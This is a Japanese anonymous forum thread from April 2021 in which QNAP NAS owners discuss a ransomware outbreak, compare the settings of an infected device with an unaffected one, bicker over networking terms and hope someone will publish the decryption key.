**不明なデバイスさん** (ﾜｯﾁｮｲ 245f-On6t) · 2021/04/23(金) 23:22:27.55

>>169
機器形態としてはその通りだけど、機能を意識すれば自然と論理構成で表現するはず。
ゆえに意味が分かっていればF/Wやルーターと言うし、理解していなければそれ以外。

**不明なデバイスさん** (ﾜｯﾁｮｲ 9c4f-Nexr) · 2021/04/23(金) 23:24:03.53

もう諦めて凄腕ハッカーが攻撃して暗号キーを公開してくれるの待つことにする

**不明なデバイスさん** (ﾜｯﾁｮｲ d8f9-zdG1) · 2021/04/23(金) 23:25:01.67

一昨日NASがハード的に死んだんで
新しいのを買おうと最新情報仕入れに来たら
えらいことになってんのね

まさか俺のもやられてるのかしら…

**不明なデバイスさん** (ﾜｯﾁｮｲ 06c3-Bsub) · 2021/04/23(金) 23:33:01.96

>>173
自分が知らない事指摘されて顔真っ赤じゃん

**不明なデバイスさん** (ﾜｯﾁｮｲ a45f-yH17) · 2021/04/23(金) 23:34:21.16

参考にならんかもだけど

共通
admin無効、管理者20桁パスワード、2段階認証有効
ポート・NAT openVPNの1ポートのみ

3月末　malware発見
機種　TS-220
QTS 4.3.x
HBS（旧版？）
myQnapCloud 利用、公開
uPnP on
QuFirewall なし

現在　被害なし
機種　TS-253D
QTS 4.5.2
HBS 3
myQnapCloud off、非公開
uPnP off
QuFirewall 最高設定

**不明なデバイスさん** (ﾜｯﾁｮｲ 4259-o8NC) · 2021/04/23(金) 23:35:50.19

>>175
俺もホワイトハッカーが暗号鍵生成方法を公開してくれるのを待つ
それまで真面目に家内NWのセキュリティ勉強するわ
お金もちゃんと出す

**不明なデバイスさん** (ﾌﾞｰｲﾓ MM5e-5CYL) · 2021/04/23(金) 23:40:06.77

>>174
仰るとおり。HGWと呼ばれるブツのことだとみんなが理解してくれるものと、甘えていたよ。

>>169
ごめんね、ごめんね。